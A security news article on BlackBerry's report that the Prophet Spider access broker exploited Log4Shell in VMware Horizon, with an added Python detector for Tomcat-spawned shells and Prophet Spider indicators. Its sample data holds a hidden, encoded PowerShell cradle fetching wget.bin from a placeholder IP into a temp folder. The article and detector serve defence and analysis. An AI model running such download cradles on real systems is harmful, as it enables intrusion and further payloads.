Attacks by the initial access broker (IAB) group Prophet Spider were found to correlate with exploitation of the recently discovered Log4j vulnerability in VMware Horizon—and a number of indicators of compromise could help security teams determine if their organizations were victims of an attack.
While VMware issued a patch for Log4Shell—as well as guidance to mitigate the flaw—late last year, many implementations have gone unpatched, according to BlackBerry Research & Intelligence and Incident Response teams that discovered the Prophet Spider attacks.
“The exploit could be reliably detected by monitoring child processes of the ws_TomcatService.exe parent process, as this is the same Tomcat service used by VMware Horizon,” according to a blog penned by BlackBerry researchers. “In all observed cases, exploitation of the ws_TomcatService.exe process spawned either cmd.exe or powershell.exe as child processes.”
When the threat actors exploited the vulnerability, the researchers wrote, they “most commonly used encoded PowerShell commands to download a second-stage payload to the victimized systems,” with the payload specifics depending on the attacker’s motives and goals. The researchers pointed to cryptomining, ransomware and extortion as examples.
“While BlackBerry primarily observed the threat actors installing cryptocurrency mining software on the affected systems, Cobalt Strike beacons were also discovered in some instances,” they said.
The researchers not only observed the mass deployment of cryptocurrency mining software and Cobalt Strike beacons but also uncovered “an instance of exploitation containing tactics, techniques and procedures (TTPs) relating to the Prophet Spider IAB,” they said. “This threat group is known to compromise networks and, later, sell access to ransomware operators. We discussed a similar group called Zebra2104 in our recent report, Hunter Becomes Hunted: Zebra2104 Hides a Herd of Malware.”
They noted that one indicator that helped them attribute the event to Prophet Spider was the use of the C:\Windows\Temp\7fde\ folder path to store malicious files. “The threat actor also downloaded a copy of the wget.bin executable, which has historically been used by the group to get additional files onto infected hosts,” they said. “The IP used in the download cradle has also been previously attributed to the Prophet Spider group.”
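The detection approach quoted above (shells spawned by ws_TomcatService.exe, encoded PowerShell download cradles, the 7fde folder and wget.bin), applied to constructed process-creation records as an added example that is not code from BlackBerry or this article. The Horizon install path, the download host, the PowerShell switch spellings and the finding labels are assumptions.

```python
import base64
import ntpath
import re
HORIZON_TOMCAT = "ws_tomcatservice.exe"          # Horizon's Tomcat service, per the post
SHELLS = {"cmd.exe", "powershell.exe"}           # child processes seen in every case
IOC_PATH, IOC_FILE = "c:\\windows\\temp\\7fde\\", "wget.bin"  # Prophet Spider indicators
# -e / -enc / -encodedcommand followed by a base64 blob (assumed switch spellings)
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:  # PowerShell expects base64 of UTF-16LE text
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_event(ev):
    """Return finding labels for one process-creation record (Sysmon ID 1 fields)."""
    findings = []
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    image = ntpath.basename(ev.get("Image", "")).lower()
    cmd = ev.get("CommandLine", "")
    if parent == HORIZON_TOMCAT and image in SHELLS:
        findings.append("tomcat-spawned-shell")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("encoded-powershell")
            cmd += " " + decoded  # check the decoded payload for indicators too
    low = cmd.lower()
    if IOC_PATH in low:
        findings.append("prophet-spider-path")
    if IOC_FILE in low:
        findings.append("prophet-spider-wget")
    return findings
def _enc(ps):  # build a constructed -EncodedCommand argument
    return base64.b64encode(ps.encode("utf-16-le")).decode()
# Constructed sample events; install path and download host are placeholders.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Horizon\bin\ws_TomcatService.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _enc(
         r"iwr http://203.0.113.10/wget.bin -OutFile C:\Windows\Temp\7fde\wget.bin")},
    {"ParentImage": r"C:\Horizon\bin\ws_TomcatService.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inv.ps1"},
]
```

A benign admin script launched from explorer.exe yields no findings, while the two Tomcat-spawned shells are flagged, with the encoded cradle also matching both Prophet Spider indicators only after decoding.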
To mitigate the exploit, Tony Lee, BlackBerry vice president of global services technical operations, said, “The simple answer for mitigating steps is to patch all vulnerable instances of Log4j, along with all other vulnerabilities—however, it is never that simple.”
Lee explained, “If an organization can pay a ransom or can be turned into a cryptomining farm, they can expect to be a target.” And that means nearly every organization is at risk.
“While a robust vulnerability management program is an absolute must, it is not the only solution,” said Lee. “A layered defense that includes 24×7 monitoring, threat intel overlay, threat hunting and AI-based endpoint protection helps in quickly identifying and mitigating breaches. The faster a compromise such as this is detected and mitigated, the better the chance of dodging the follow-on ransomware attack.”
That Prophet Spider has exploited the Log4j flaw speaks to the ample opportunities it presents to would-be attackers. “When an IAB group takes interest in a vulnerability whose scope may never be known, this gives us a good indication that they see significant value in its exploitation,” the researchers said. “It’s likely that we will continue to see criminal groups exploring the opportunities of the Log4Shell vulnerability in the near future, as IT teams and users continue to scramble to address these vulnerabilities.”
But Log4j is just the latest shiny object in what promises to be a long line of exploitable vulnerabilities for IABs. “Initial access brokers leverage any opportunity to gain access to an organization,” said SCYTHE CTO Jorge Orchilles.
“They must maintain that access as they sell it and hand it off to the buyer. Today, the exploit being used is for Log4j; tomorrow it will be another,” said Orchilles. “As defenders, we want to be able to detect and respond to the inevitable exploit that will one day break through our protection.”
He noted that regardless of the exploit, security teams “can detect and respond to what happens after by testing, training and improving our people, process and security controls. This is an ever-evolving field and we must collaborate to stay ahead of the threats.”